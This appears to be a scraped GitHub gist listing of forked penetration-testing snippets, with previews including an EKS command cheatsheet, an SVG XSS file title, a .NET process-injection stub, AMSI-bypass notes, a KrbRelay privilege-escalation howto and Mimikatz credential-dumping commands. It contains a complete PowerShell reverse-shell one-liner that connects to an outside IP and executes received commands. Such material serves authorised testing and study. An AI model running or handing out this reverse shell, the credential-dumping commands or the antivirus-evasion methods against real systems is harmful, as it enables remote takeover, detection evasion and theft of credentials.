Pentesting-Exploitation Programs and Commands , Protocols Network / Ports
0nopnop
0nopnop
/ xss-image.svg
Last active
January 28, 2025 10:36
— forked from rudSarkar/xss-image.svg
SVG Image XSS File
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
0nopnop
/ DInjectQueuerAPC.cs
Created
July 3, 2024 16:07
— forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
0nopnop
/ Exploitation.md
Created
April 18, 2024 16:03
— forked from yezz123/Exploitation.md
Pentesting-Exploitation
0nopnop
/ Red-Teaming-tool.md
Created
April 15, 2024 08:55
— forked from z0rs/Red-Teaming-tool.md
0nopnop
/ gist:41b8213d640ebf6e15ea627bf57574d6
Created
June 27, 2023 08:23
— forked from suhas316380/gist:969620d95e111b9b34c7e1689ada722d
awscli and kubectl cheatsheet for EKS
curl -s https://docs.aws.amazon.com/eks/latest/userguide/doc-history.rss | grep "<title>Kubernetes version"
eksctl create cluster --version=1.14 --name suhas-eks-test --region us-east-1 --zones us-east-1a,us-east-1b --node-type t2.medium --nodes 2 --ssh-access=true --ssh-public-key basarkod-test
eksctl create cluster --without-nodegroup --version=1.14 --name delete-me --vpc-public-subnets=subnet-123,subnet-456
0nopnop
/ powershell_reverse_shell.ps1
Created
June 9, 2023 16:20
— forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
0nopnop
/ amsi-bypass.md
Created
June 8, 2023 15:24
— forked from D3Ext/amsi-bypass.md
All methods to bypass AMSI (2022)
To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI
However some methods may be detected by the AV but most of them actually work without problem
The first and worst way to bypass AMSI is downgrading powershell version to 2.0.
0nopnop
/ AngularTI.md
Created
May 10, 2023 15:48
— forked from mccabe615/AngularTI.md
Angular Template Injection Payloads
0nopnop
/ krbrelay_privesc_howto.md
Created
December 5, 2022 22:48
— forked from tothi/krbrelay_privesc_howto.md
Privilege Escalation using KrbRelay and RBCD
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
0nopnop
/ Mimikatz-cheatsheet
Created
December 5, 2022 16:36
— forked from insi2304/Mimikatz-cheatsheet
Mimikatz Cheat Sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #general | |
| privilege::debug | |
| log | |
| log customlogfilename.log | |
| #sekurlsa | |
| sekurlsa::logonpasswords | |
| sekurlsa::logonPasswords full |
NewerOlder